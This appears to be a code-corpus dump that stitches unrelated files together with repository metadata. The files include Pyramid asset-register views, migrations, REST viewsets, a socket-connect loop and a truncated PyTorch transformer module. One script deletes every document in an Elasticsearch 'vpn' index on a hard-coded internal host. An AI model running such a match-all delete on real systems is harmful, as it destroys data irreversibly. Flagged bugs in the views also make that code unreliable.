            # Restrict to rows of the session's unit subtree (prefix match on
            # the unit code) that are not disabled.
            query = DBSession.query(AsetKib).\
                    join(AsetKategori, Unit).\
                    filter(AsetKib.unit_id == Unit.id,
                           #AsetKib.unit_id == ses['unit_id'],
                           AsetKib.kategori_id==AsetKategori.id,
                           AsetKib.kib=='F',
                           func.substr(Unit.kode,1,func.length(ses['unit_kd']))==ses['unit_kd'],
                           or_(AsetKib.disabled=='0',AsetKib.disabled==None))
            rowTable = DataTables(req, AsetKib, query, columns)
            return rowTable.output_result()
    #######
    # Add #
    #######
    def form_validator(self, form, value):
        """Form-level validator; currently looks up the row but checks nothing."""
        if 'id' in form.request.matchdict:
            uid = form.request.matchdict['id']
            q = DBSession.query(AsetKib).filter_by(id=uid)
            kebijakan = q.first()
        else:
            kebijakan = None
    def get_form(self, class_form, row=None):
        """Build a deform Form for *class_form*, optionally deserializing *row*."""
        schema = class_form(validator=self.form_validator)
        schema = schema.bind()
        schema.request = self.request
        if row:
            schema.deserialize(row)
        return Form(schema, buttons=('simpan','batal'))
    def save(self, values, user, row=None):
        """Create or update an AsetKib row from form *values* and flush it.

        A fresh ``no_register`` is allocated per (tahun, unit, kategori)
        when none is supplied; ``jumlah`` is always forced to 1 because the
        add view clones rows instead of storing a quantity.
        """
        if not row:
            row = AsetKib()
            row.created = datetime.now()
            row.create_uid = user.id
        row.from_dict(values)
        row.updated = datetime.now()
        row.update_uid = user.id
        row.disabled = 'disabled' in values and values['disabled'] and 1 or 0
        a = row.tahun
        b = row.unit_id
        c = row.kategori_id
        if not row.no_register:
            row.no_register = AsetKib.get_no_register(a,b,c)+1;
        row.jumlah=1
        DBSession.add(row)
        DBSession.flush()
        return row
    def save_request(self, values, row=None):
        """Persist *values* (honouring an 'id' in the URL) and flash a message."""
        if 'id' in self.request.matchdict:
            values['id'] = self.request.matchdict['id']
        row = self.save(values, self.request.user, row)
        self.request.session.flash('KIB sudah disimpan.')
    def route_list(self):
        """Redirect back to the KIB F list page."""
        return HTTPFound(location=self.request.route_url('aset-kibf'))
    def session_failed(self, session_name):
        """Pop a previously stored failed form from the session and return it."""
        r = dict(form=self.session[session_name])
        del self.session[session_name]
        return r
    @view_config(route_name='aset-kibf-add', renderer='templates/kibs/add_kibf.pt',
                 permission='add')
    def view_kebijakan_add(self):
        """Add view: validate, save the first row, then clone it
        ``jumlah - 1`` more times, each clone getting its own no_register."""
        req = self.request
        ses = self.session
        form = self.get_form(AddSchema)
        if req.POST:
            if 'simpan' in req.POST:
                controls = req.POST.items()
                controls_dicted = dict(controls)
                # Collect the submitted form values
                units_id = controls_dicted['unit_id']
                units_nama = controls_dicted['unit_nm']
                units_kode = controls_dicted['unit_kd']
                kats_id = controls_dicted['kategori_id']
                kats_kode = controls_dicted['kategori_kd']
                kats_uraian = controls_dicted['kategori_nm']
                no_register = controls_dicted['no_register']
                pemiliks_id = controls_dicted['pemilik_id']
                pemiliks_uraian = controls_dicted['pemilik_nm']
                masa_manfaat = controls_dicted['masa_manfaat']
                #uraian = controls_dicted['uraian']
                tahun = controls_dicted['tahun']
                tgl_perolehan = controls_dicted['tgl_perolehan']
                #cara_perolehan = controls_dicted['cara_perolehan']
                th_beli = controls_dicted['th_beli']
                asal_usul = controls_dicted['asal_usul']
                harga = controls_dicted['harga']
                # Read the requested quantity; each stored row keeps jumlah=1
                jml = controls_dicted['jumlah']
                jmlh = "%s" % jml
                jumlah = int(jmlh)
                controls_dicted['jumlah'] = 1
                satuan = controls_dicted['satuan']
                kondisi = controls_dicted['kondisi']
                keterangan = controls_dicted['keterangan']
                kib = controls_dicted['kib']
                f_bertingkat_tidak = controls_dicted['f_bertingkat_tidak']
                f_beton_tidak = controls_dicted['f_beton_tidak']
                f_panjang = controls_dicted['f_panjang']
                f_lebar = controls_dicted['f_lebar']
                f_luas_lantai = controls_dicted['f_luas_lantai']
                f_lokasi = controls_dicted['f_lokasi']
                f_dokumen_tanggal = controls_dicted['f_dokumen_tanggal']
                f_dokumen_nomor = controls_dicted['f_dokumen_nomor']
                f_status_tanah = controls_dicted['f_status_tanah']
                f_kode_tanah = controls_dicted['f_kode_tanah']
                f_luas_bangunan = controls_dicted['f_luas_bangunan']
                try:
                    c = form.validate(controls)
                except ValidationFailure, e:
                    return dict(form=form, kat_prefix=KAT_PREFIX)
                row = self.save_request(dict(controls))
                # Insert clones according to the requested quantity
                a = jumlah - 1
                b = 0
                for b in range (0,a):
                    aset = AsetKib()
                    aset.unit_id = units_id
                    aset.kategori_id = kats_id
                    aset.pemilik_id = pemiliks_id
                    #aset.uraian = uraian
                    aset.tahun = tahun
                    aset.no_register = AsetKib.get_no_register(tahun,units_id,kats_id)+1;
                    aset.tgl_perolehan = tgl_perolehan
                    #aset.cara_perolehan = cara_perolehan
                    aset.th_beli = th_beli
                    aset.asal_usul = asal_usul
                    aset.harga = harga
                    aset.jumlah = 1
                    aset.satuan = satuan
                    aset.kondisi = kondisi
                    aset.keterangan = keterangan
                    aset.kib = kib
                    aset.masa_manfaat = masa_manfaat
                    aset.f_bertingkat_tidak = f_bertingkat_tidak
                    aset.f_beton_tidak = f_beton_tidak
                    aset.f_panjang = f_panjang
                    aset.f_lebar = f_lebar
                    aset.f_luas_lantai = f_luas_lantai
                    aset.f_lokasi = f_lokasi
                    aset.f_dokumen_tanggal = f_dokumen_tanggal
                    aset.f_dokumen_nomor = f_dokumen_nomor
                    aset.f_status_tanah = f_status_tanah
                    aset.f_kode_tanah = f_kode_tanah
                    aset.f_luas_bangunan = f_luas_bangunan
                    DBSession.add(aset)
                    DBSession.flush()
                return self.route_list()
        elif SESS_ADD_FAILED in req.session:
            return self.session_failed(SESS_ADD_FAILED)
        return dict(form=form, kat_prefix=KAT_PREFIX)
    ########
    # Edit #
    ########
    def query_id(self):
        """Query for the AsetKib row addressed by the 'id' matchdict entry."""
        return DBSession.query(AsetKib).filter_by(id=self.request.matchdict['id'])
    def id_not_found(self):
        """Flash a not-found message and return to the list.

        NOTE(review): ``request`` and ``route_list`` are unqualified here
        (presumably meant ``self.request`` / ``self.route_list``), so this
        handler raises NameError if it is ever reached.
        """
        msg = 'KIB ID %s Tidak Ditemukan.' % self.request.matchdict['id']
        request.session.flash(msg, 'error')
        return route_list()
    @view_config(route_name='aset-kibf-edit', renderer='templates/kibs/add_kibf.pt',
                 permission='edit')
    def view_kebijakan_edit(self):
        """Edit view: prefill the form from the row (mapping NULLs to
        defaults) and save the submitted changes."""
        request = self.request
        row = self.query_id().first()
        if not row:
            # NOTE(review): should be ``self.id_not_found()``; as written
            # this raises NameError (and id_not_found takes no argument).
            return id_not_found(request)
        rowd={}
        rowd['id'] = row.id
        rowd['unit_id'] = row.units.id
        rowd['unit_nm'] = row.units.nama
        rowd['unit_kd'] = row.units.kode
        rowd['kategori_id'] = row.kats.id
        rowd['kategori_kd'] = row.kats.kode
        rowd['kategori_nm'] = row.kats.uraian
        rowd['no_register'] = row.no_register
        rowd['pemilik_id'] = row.pemiliks.id
        rowd['pemilik_nm'] = row.pemiliks.uraian
        #rowd['uraian'] = row.uraian
        rowd['tgl_perolehan'] = row.tgl_perolehan
        #rowd['cara_perolehan'] = row.cara_perolehan
        rowd['th_beli'] = row.th_beli
        rowd['asal_usul'] = row.asal_usul
        rowd['harga'] = row.harga
        rowd['jumlah'] = row.jumlah
        rowd['satuan'] = row.satuan
        rowd['kondisi'] = row.kondisi
        rowd['keterangan'] = row.keterangan
        #rowd['masa_manfaat'] = row.masa_manfaat
        if row.masa_manfaat == None :
            rowd['masa_manfaat'] = 0
        else :
            rowd['masa_manfaat'] = row.masa_manfaat
        rowd['kib'] = row.kib
        #rowd['f_bertingkat_tidak'] = row.f_bertingkat_tidak
        if row.f_bertingkat_tidak==None:
            rowd['f_bertingkat_tidak'] = 'Tidak'
        else :
            rowd['f_bertingkat_tidak'] = row.f_bertingkat_tidak
        #rowd['f_beton_tidak'] = row.f_beton_tidak
        if row.f_beton_tidak==None:
            rowd['f_beton_tidak'] = 'Tidak'
        else :
            rowd['f_beton_tidak'] = row.f_beton_tidak
        #rowd['f_panjang'] = row.f_panjang
        if row.f_panjang == None :
            rowd['f_panjang'] = 0
        else :
            rowd['f_panjang'] = row.f_panjang
        #rowd['f_lebar'] = row.f_lebar
        if row.f_lebar == None :
            rowd['f_lebar'] = 0
        else :
            rowd['f_lebar'] = row.f_lebar
        #rowd['f_luas_lantai'] = row.f_luas_lantai
        if row.f_luas_lantai == None :
            rowd['f_luas_lantai'] = 0
        else :
            rowd['f_luas_lantai'] = row.f_luas_lantai
        rowd['f_lokasi'] = row.f_lokasi
        rowd['f_dokumen_tanggal'] = row.f_dokumen_tanggal
        rowd['f_dokumen_nomor'] = row.f_dokumen_nomor
        rowd['f_status_tanah'] = row.f_status_tanah
        rowd['f_kode_tanah'] = row.f_kode_tanah
        #rowd['f_luas_bangunan'] = row.f_luas_bangunan
        if row.f_luas_bangunan == None :
            rowd['f_luas_bangunan'] = 0
        else :
            rowd['f_luas_bangunan'] = row.f_luas_bangunan
        form = self.get_form(EditSchema)
        form.set_appstruct(rowd)
        if request.POST:
            if 'simpan' in request.POST:
                controls = request.POST.items()
                try:
                    c = form.validate(controls)
                except ValidationFailure, e:
                    return dict(form=form)
                self.save_request(dict(controls), row)
                return self.route_list()
        elif SESS_EDIT_FAILED in request.session:
            return self.session_failed(SESS_EDIT_FAILED)
        return dict(form=form)
    ##########
    # Delete #
    ##########
    @view_config(route_name='aset-kibf-delete', renderer='templates/kibs/delete.pt',
                 permission='delete')
    def view_delete(self):
        """Confirmation page + handler for deleting one KIB row."""
        request = self.request
        q = self.query_id()
        row = q.first()
        if not row:
            # NOTE(review): id_not_found() takes no positional argument, so
            # this call would raise TypeError if the row is missing.
            return self.id_not_found(request)
        form = Form(colander.Schema(), buttons=('hapus','batal'))
        if request.POST:
            if 'hapus' in request.POST:
                msg = 'KIB ID %d %s sudah dihapus.' % (row.id, row.kats.uraian)
                try:
                    q.delete()
                    DBSession.flush()
                except:
                    msg = 'KIB ID %d %s tidak dapat dihapus.' % (row.id, row.kats.uraian)
                request.session.flash(msg)
                return self.route_list()
        return dict(row=row,form=form.render())
    ##########
    # CSV    #
    ##########
    @view_config(route_name='aset-kibf-csv', renderer='csv',
                 permission='read')
    def export_csv(self):
        """Export the unit's KIB 'F' rows as a timestamped CSV attachment."""
        request = self.request
        ses = self.request.session
        query = DBSession.query(Unit.kode.label('Kode_Unit'), Unit.nama.label('Nama_Unit'),
                    AsetKategori.kode.label('Kode_Kategori'), AsetKib.no_register.label('No_Register'), AsetKategori.uraian.label('Nama_Kategori'),
                    AsetPemilik.uraian.label('Pemilik'), AsetKib.keterangan.label('Keterangan'),
                    AsetKib.tgl_perolehan.label('Tgl_Perolehan'), AsetKib.asal_usul.label('Asal_Usul'), AsetKib.harga.label('Harga'),
                    AsetKib.jumlah.label('Jumlah'), AsetKib.kondisi.label('Kondisi'), AsetKib.kib.label('Kib'), AsetKib.masa_manfaat.label('Masa_Manfaat'),
                    AsetKib.f_bertingkat_tidak.label('Bertingkat/Tidak'), AsetKib.f_beton_tidak.label('Beton/Tidak'),
                    AsetKib.f_panjang.label('Panjang'), AsetKib.f_lebar.label('Lebar'), AsetKib.f_luas_lantai.label('Luas_Lantai'),
                    AsetKib.f_luas_bangunan.label('Luas_Bangunan'),
                    AsetKib.f_dokumen_tanggal.label('Tgl_Dokumen'), AsetKib.f_dokumen_nomor.label('No_Dokumen'), AsetKib.f_kode_tanah.label('Kode_Tanah'),
                    AsetKib.f_status_tanah.label('Status_Tanah')
                ).filter(AsetKib.unit_id == Unit.id,
                           AsetKib.pemilik_id == AsetPemilik.id,
                           AsetKib.kategori_id==AsetKategori.id,
                           AsetKib.kib=='F',
                           func.substr(Unit.kode,1,func.length(ses['unit_kd']))==ses['unit_kd'],
                           or_(AsetKib.disabled=='0',AsetKib.disabled==None)
                ).order_by(Unit.kode, AsetKategori.kode, AsetKib.no_register
                )
        r = query.first()
        if not r:
            request.session.flash('Data tidak ada')
            return self.route_list()
        header = r.keys()
        query = query.all()
        rows = []
        for item in query:
            rows.append(list(item))
        # override attributes of response
        filename = 'KIB_F%s.csv' % datetime.now().strftime('%Y%m%d%H%M%S')
        self.request.response.content_disposition = 'attachment;filename=' + filename
        return {
          'header': header,
          'rows': rows,
        }
|
[
"aa.gustiana@gmail.com"
] |
aa.gustiana@gmail.com
|
344d835fca51a69fbe7499ca2800afeda5c9c9cd
|
871387eeab8d9a6de8d6d395b09bae83cdefe497
|
/Flask/migrateDemo/migrations/versions/cdd196201d1e_.py
|
556a4c713f76cf1b90f96cc78996ef941342d22f
|
[] |
no_license
|
huangjichaolucky/python_PyCharm_Use
|
f13e3c46a7f9648c76dba864bdbde5a7ef788ce6
|
f052ec385f3c748bb13dbd2103e07ffd629d8a76
|
refs/heads/master
| 2021-08-19T12:16:28.066253
| 2017-11-26T06:41:01
| 2017-11-26T06:41:01
| 110,697,493
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
"""empty message
Revision ID: cdd196201d1e
Revises:
Create Date: 2017-11-23 03:40:48.542867
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'cdd196201d1e'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Schema upgrade: add the non-nullable ``tag`` column to ``article``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('article', sa.Column('tag', sa.String(length=100), nullable=False))
    # ### end Alembic commands ###
def downgrade():
    """Schema downgrade: drop the ``tag`` column from ``article`` again."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('article', 'tag')
    # ### end Alembic commands ###
|
[
"781178325@qq.com"
] |
781178325@qq.com
|
445ee8cfc51f5929c0c2dc7ceb6ce75e61128534
|
3b81c00288f62c1c2492bc573945a5547db1644e
|
/Chapter 1/3_Raw String.py
|
a8cb6e1411734ef4abaeb5f9c9170559f2c0d667
|
[] |
no_license
|
sahil4683/python-temp
|
25b00d1a3c736ac65c9d8b18cca971438a34551c
|
130999a394e001f2f2edc827312089576c4c55bd
|
refs/heads/main
| 2023-01-03T17:02:34.195146
| 2020-10-17T16:16:10
| 2020-10-17T16:16:10
| 304,918,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
print(r"Hello \n \t \b \'\"\ World") # the r prefix disables escape processing, so the backslash sequences print literally
|
[
"sahil4683@gmail.com"
] |
sahil4683@gmail.com
|
127f1bd1dcdc2933fc0764befb9de27bf1b79466
|
d24ea14c01a0e6f23cf7409361cb3437c87e7d86
|
/company_health/api/reports.py
|
6d7b681704f2d8a560bdd057b1dc59be1744fee7
|
[
"MIT"
] |
permissive
|
Korulag/ipz
|
df9be513f8b50a5e148740343d18724b2c159ea3
|
1838aac749915b051ddcac85ec663acf5767def6
|
refs/heads/master
| 2022-09-23T12:10:53.385786
| 2020-06-05T18:00:02
| 2020-06-05T18:00:02
| 254,825,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 797
|
py
|
from company_health.api.base import BaseViewSet
from company_health.apps.reports.models import *
from company_health.apps.reports.serializers import *
__all__ = ['CompanyReportViewSet', 'PersonalReportViewSet', 'TeamReportViewSet']
class CompanyReportViewSet(BaseViewSet):
    """CRUD endpoints over all CompanyReport rows (PATCH deliberately absent)."""
    http_method_names = ['delete', 'get', 'post', 'put']
    queryset = CompanyReport.objects.all()
    serializer_class = CompanyReportSerializer
class PersonalReportViewSet(BaseViewSet):
    """CRUD endpoints over all PersonalReport rows (PATCH deliberately absent)."""
    http_method_names = ['delete', 'get', 'post', 'put']
    queryset = PersonalReport.objects.all()
    serializer_class = PersonalReportSerializer
class TeamReportViewSet(BaseViewSet):
    """CRUD endpoints over all TeamReport rows (PATCH deliberately absent)."""
    http_method_names = ['delete', 'get', 'post', 'put']
    queryset = TeamReport.objects.all()
    serializer_class = TeamReportSerializer
|
[
"kleshev12@gmail.com"
] |
kleshev12@gmail.com
|
8b6e08127dc4d002ee45dc81a4499e737891cf97
|
8abcca39940c4d4194dee185ce097aecbea41498
|
/pyvpnscript/deletedata.py
|
8fcdb198d88e7810a063c28de3c952e3a0263a02
|
[] |
no_license
|
jianqiang08/mypython
|
a0c996177004aa8c4606dd010ccda0d51602aaf1
|
05e8c4faba32c07078eae192992febd4f1151134
|
refs/heads/master
| 2021-08-22T05:58:48.632962
| 2017-11-29T12:25:40
| 2017-11-29T12:25:40
| 112,471,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import elasticsearch
# WARNING: destructive maintenance script -- wipes every document of the
# selected doc_type from the 'vpn' index on the hard-coded cluster.
es = elasticsearch.Elasticsearch('172.16.37.40:9200')
# match_all selects every document.
query_string = r'{ "query": { "match_all": {} }}'
res = es.delete_by_query(index='vpn', doc_type='user_info', body=query_string)
#es.delete_by_query(index='vpn', doc_type='start_used_vpn', body=query_string)
#es.delete_by_query(index='vpn', doc_type='used_vpn', body=query_string)
print(res)
|
[
"wangjianqiang@wangjianqiangdeMacBook-Pro.local"
] |
wangjianqiang@wangjianqiangdeMacBook-Pro.local
|
55e3da8c06e8129796c1baa879af437badd6dc66
|
bc531b7d1819ca5b8ba9d42395ce9e4676978fe1
|
/Chapter06/shutil_make_archive.py
|
3b5afb43200df5f36605743570ee4cb47e8813f5
|
[
"MIT"
] |
permissive
|
PacktPublishing/Mastering-Python-Scripting-for-System-Administrators-
|
b72cacd9c54a3d9ec49100b2e5a49532960d58cc
|
d6ad3ea82ff503083176808166f727f52b187325
|
refs/heads/master
| 2023-01-27T19:56:06.109090
| 2023-01-18T09:00:19
| 2023-01-18T09:00:19
| 161,440,105
| 175
| 216
|
MIT
| 2022-10-08T19:33:46
| 2018-12-12T06:00:41
|
Python
|
UTF-8
|
Python
| false
| false
| 243
|
py
|
import tarfile
import shutil
import sys
# Build work.tar.gz from the sibling "work" directory, then list its contents.
shutil.make_archive('work', 'gztar', root_dir='..', base_dir='work')
print('\nArchive contents:')
with tarfile.open('work.tar.gz', 'r') as archive:
    for member_name in archive.getnames():
        print(member_name)
|
[
"noreply@github.com"
] |
PacktPublishing.noreply@github.com
|
4d98551f6376e47a37a8e3b79cbdf27bfa24a014
|
ced0efb0666b5817b9656cd533cf6f5db0085fe8
|
/py/server/nc.py
|
68467db2e7ae3bb3b99f16c505e41e525d8938ae
|
[] |
no_license
|
adithyaphilip/learning
|
11fb6997ab3d613a358502dfff0ae9b91cd5ee27
|
64ecd3bc622077c7256df91cdf4dfbc8adf23068
|
refs/heads/master
| 2021-06-01T18:04:46.733092
| 2016-09-22T18:22:46
| 2016-09-22T18:22:46
| 68,949,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
import socket
from threading import Thread
from time import sleep
# Port to connect to on localhost, read from stdin.
port = int(input())
while True:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Run the (blocking) connect on a background thread so the loop continues.
    Thread(target = s.connect, args = (("localhost", port),)).start()
    #s.send("hello".encode("utf-8"))
    sleep(1)
    print("lol")
    # NOTE(review): close() runs on the main thread and can race the
    # connect() still executing in the worker thread.
    s.close()
|
[
"adithyaphilip@gmail.com"
] |
adithyaphilip@gmail.com
|
8ff97c12f5fc42f8f0828de216d82d8fa23977e3
|
865f08db5ebb42f13b00c467345121566bd8fa78
|
/teacherview/migrations/0009_status_log_in_check.py
|
87c5774fdf953854334834785bdfd249c39ffb86
|
[] |
no_license
|
eventdips/eventdips-django
|
e872d318e24b698e41f4622fe765f11bb9f2410e
|
7c020014fb6076cf3ed84803bdefbb2fe2636155
|
refs/heads/master
| 2022-12-11T05:52:27.251584
| 2020-07-25T11:08:45
| 2020-07-25T11:08:45
| 232,338,576
| 0
| 1
| null | 2022-11-23T11:37:44
| 2020-01-07T14:10:55
|
HTML
|
UTF-8
|
Python
| false
| false
| 406
|
py
|
# Generated by Django 2.2.4 on 2019-10-19 11:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add ``Status.log_in_check`` (single-character flag, default 'R')."""
    dependencies = [
        ('teacherview', '0008_auto_20191018_1503'),
    ]
    operations = [
        migrations.AddField(
            model_name='status',
            name='log_in_check',
            field=models.CharField(default='R', max_length=1),
        ),
    ]
|
[
"aayushdani1@gmail.com"
] |
aayushdani1@gmail.com
|
8c4dbbf88d04a891287f2d8658b3049e75620570
|
fe8bc976b7a7c6cf428ce25b4ddd5507125176af
|
/util_transformer.py
|
2e7a643ed6246fdacb5e43c2b2a07a0042b54c2e
|
[] |
no_license
|
asahi417/pytorch-language-model
|
0b257035e44611f65da041da1bf00f0e4511d296
|
c5089ca174cb64b89e3898d42bf1508bfa91e532
|
refs/heads/master
| 2022-11-27T05:04:53.529252
| 2020-07-16T06:17:05
| 2020-07-16T06:17:05
| 233,868,353
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,371
|
py
|
""" pytorch transformer decoder implementation """
import math
import torch
import torch.nn as nn
__all__ = [
"PositionalEmbedding",
"Conv1D",
"PointwiseFeedForward",
"SelfMaskedAttention",
"TransformerBlock",
"TransformerDecoder",
]
EPS = 1e-5 # numeric stability for division
EPS_LAYER_NORM = 1e-5 # numeric stability for layernorm
CLAMP_EXP = 15 # to avoid exploding exponentiation
class PositionalEmbedding(nn.Module):
    """Sinusoidal positional embedding over a 1-D tensor of positions."""

    def __init__(self, n_emb):
        super().__init__()
        # One inverse frequency per pair of output channels: 10000^(-2i/n_emb).
        exponents = torch.arange(0.0, n_emb, 2.0) / n_emb
        self.register_buffer('inv_freq', 1 / (10000 ** exponents))

    def forward(self, pos_seq):
        """Map positions to embeddings of shape (len(pos_seq), n_emb).

        Parameter
        -----------
        pos_seq: 1-D tensor including sequence of relative position

        The first half of the channels is sin, the second half cos.
        """
        angles = torch.outer(pos_seq, self.inv_freq)
        return torch.cat([angles.sin(), angles.cos()], dim=-1)
class Conv1D(nn.Module):
    """Pointwise linear layer applied independently at every sequence position."""

    def __init__(self,
                 n_input: int,
                 n_output: int):
        """
        Parameter
        -----------
        n_input: int
            input dimension
        n_output: int
            output dimension
        """
        super().__init__()
        self._n_input = n_input
        self._n_output = n_output
        self.linear = nn.Linear(self._n_input, self._n_output)
        # Small-std normal initialization of the weight matrix.
        self.linear.weight.data.normal_(std=0.02)

    def forward(self, x):
        """Apply the linear map position-wise.

        x: (batch, sequence, n_input) -> (batch, sequence, n_output)
        """
        n_batch, n_seq, n_dim = x.size()
        assert n_dim == self._n_input
        flat = self.linear(x.view(-1, self._n_input))
        return flat.view(n_batch, n_seq, self._n_output)
class PointwiseFeedForward(nn.Module):
    """Position-wise feed-forward block: Conv1D -> gelu -> Conv1D."""

    def __init__(self,
                 n_embedding: int,
                 n_state_ffn: int):
        """
        Parameter
        --------------
        n_embedding: int
            embedding dimension (input and output size)
        n_state_ffn: int
            hidden (intermediate) state dimension
        """
        super().__init__()
        self._n_embedding = n_embedding
        self._n_state_ffn = n_state_ffn
        self.linear_1 = Conv1D(n_embedding, n_state_ffn)
        self.linear_2 = Conv1D(n_state_ffn, n_embedding)

    def forward(self, x):
        """(batch, sequence, n_embedding) -> (batch, sequence, n_embedding)"""
        hidden = self.gelu(self.linear_1(x))
        return self.linear_2(hidden)

    @staticmethod
    def gelu(x):
        # tanh approximation of the Gaussian error linear unit
        return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
class SelfMaskedAttention(nn.Module):
""" masked multiheads self (causal) attention module """
def __init__(self,
n_embedding: int,
n_head: int,
dropout_attention: float,
dropout_residual: float,
n_context: int,
n_positional_embedding: int):
""" masked multi-heads self (causal) attention module with caching
Parameter
-------------
n_embedding: int
embedding dimension
n_head: int
number of attention head
dropout_attention: float
dropout_residual: float
"""
super().__init__()
assert n_embedding % n_head == 0
self.linear_qkv = Conv1D(n_embedding, n_embedding * 3) # 1d conv to get qkv once
self.linear_heads = Conv1D(n_embedding, n_embedding)
self.dropout_attention = nn.Dropout(dropout_attention)
self.dropout_residual = nn.Dropout(dropout_residual)
self.register_buffer(
'mask',
torch.tensor([[int(r <= c) for r in range(n_context)] for c in range(n_context)], dtype=torch.float))
self.n_embedding = n_embedding
self.n_head = n_head
self.n_context = n_context
if n_positional_embedding:
self.linear_position = Conv1D(n_positional_embedding, n_embedding)
else:
self.linear_position = None
def query_key_value(self, x, cached_key_value: list = None):
""" get query/key/value vector for each head
Parameter
------------
x: tensor (batch, seq, dim)
cached_key_value: list of two tensors (batch, n_head, dim / n_head, cached_seq), [cached_key, cached_value]
Return
------------
q: tensor (batch, self.n_head, seq, dim / self.n_head)
v: tensor (batch, self.n_head, seq + cached_seq, dim / self.n_head)
k: tensor (batch, self.n_head, dim / self.n_head, seq + cached_seq)
* `cached_seq` is zero if cached_key_value is None.
"""
def __split_into_heads(tensor):
n_batch, n_seq, n_dim = tensor.size()
assert n_dim == self.n_embedding
tensor = tensor.view(n_batch, n_seq, self.n_head, int(self.n_embedding / self.n_head))
tensor = tensor.permute(0, 2, 1, 3).contiguous()
return tensor
qkv = self.linear_qkv(x) # batch, seq, n_dim * 3
q, k, v = torch.split(qkv, self.n_embedding, dim=-1) # (batch, seq, n_dim) x 3
q = __split_into_heads(q)
v = __split_into_heads(v)
k = __split_into_heads(k)
k = k.permute(0, 1, 3, 2).contiguous()
if cached_key_value is not None:
cached_k, cached_v = cached_key_value
assert list(k.size())[:-1] == list(cached_k.size())[:-1]
assert list(v.permute(0, 1, 3, 2).size())[:-1] == list(cached_v.permute(0, 1, 3, 2).size())[:-1]
v = torch.cat([cached_v, v], dim=2)
k = torch.cat([cached_k, k], dim=3)
return q, k, v
def masked_attention_weight(self, q, k,
r_position_embedding=None,
r_content_bias=None,
r_position_bias=None):
""" causal mask attention weight by lower triangular mask
[[1., 0., 0., 0., 0.],
[1., 1., 0., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 1., 1., 1., 0.],
[1., 1., 1., 1., 1.]]
Parameter
-----------
q: tensor (batch, self.n_head, seq, dim / self.n_head)
k: tensor (batch, self.n_head, dim / self.n_head, seq + cached_seq)
r_position_embedding: tensor (seq + cached_seq, n_pos_dim)
Return
-----------
att_weight: tensor (batch, head, seq, seq + cache)
3rd axis is attended, and 4th is attending
"""
att_weight = torch.matmul(q, k)
batch, n_head, seq_attended, seq_attending = att_weight.size()
cached_len = seq_attending - seq_attended
assert self.n_head == n_head
assert self.n_context == seq_attended
if self.linear_position:
assert r_position_embedding is not None
assert r_content_bias is not None
assert r_position_bias is not None
assert cached_len >= 0
# attended, attending, n_pos_emb
rel_pos = torch.stack(
[torch.stack([r_position_embedding[int(max(0, c - r)), :].contiguous()
for r in range(-cached_len, self.n_context)])
for c in range(self.n_context)])
# attended, attending, n_emb
rel_pos = self.linear_position(rel_pos)
_dim = int(self.n_embedding / self.n_head)
# 1, attended, attending, n_head, n_emb/n_head, 1
rel_pos = rel_pos.view(1, self.n_context, seq_attending, self.n_head, _dim, 1)
# 1, n_head, attended, attending, n_emb/n_head, 1
rel_pos = rel_pos.permute(0, 3, 1, 2, 4, 5).contiguous()
#######
# (b) #
#######
# batch, n_head, attended, 1, 1, dim / self.n_head)
_q = q.view(batch, self.n_head, self.n_context, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_q, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape == att_weight_new.shape
att_weight = att_weight_new + att_weight
#######
# (c) #
#######
_r_content_bias = r_content_bias.view(1, self.n_head, 1, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_r_content_bias, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1 and att_weight_new.size(0) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape[1:4] == att_weight_new.shape[1:4]
att_weight = att_weight_new + att_weight
#######
# (d) #
#######
_r_position_bias = r_position_bias.view(1, self.n_head, 1, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_r_position_bias, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1 and att_weight_new.size(0) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape[1:4] == att_weight_new.shape[1:4]
att_weight = att_weight_new + att_weight
# create mask for causal attention
if cached_len == 0:
mask = self.mask
else:
sub_mask = torch.ones((self.n_context, cached_len), device=self.mask.device, dtype=self.mask.dtype)
mask = torch.cat([sub_mask, self.mask], dim=1)
else:
assert self.n_context == seq_attending and cached_len == 0
mask = self.mask
att_weight = self.masked_softmax(att_weight / math.sqrt(q.size(-1)), mask=mask, dim=-1)
att_weight = self.dropout_attention(att_weight)
return att_weight
@staticmethod
def masked_softmax(vec, mask, dim=1):
    """Softmax over `dim` that ignores masked-out positions.

    Positions where `mask` is zero contribute nothing to the distribution.
    The logits are clamped before exponentiation because an unbounded input
    to `exp` overflows very easily in float32.
    """
    clamped = torch.clamp(vec.float(), min=-CLAMP_EXP, max=CLAMP_EXP)
    weights = mask.float() * torch.exp(clamped)
    # EPS keeps the division finite when an entire row is masked out
    normalizer = weights.sum(dim, keepdim=True) + EPS
    return weights / normalizer
def forward(self,
            x,
            cached_key_value: list=None,
            r_position_embedding=None,
            r_content_bias=None,
            r_position_bias=None):
    """Return the attended context vector for the input sequence.

    Parameter
    ------------
    x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
    cached_key_value: list of two tensors [cached_key, cached_value],
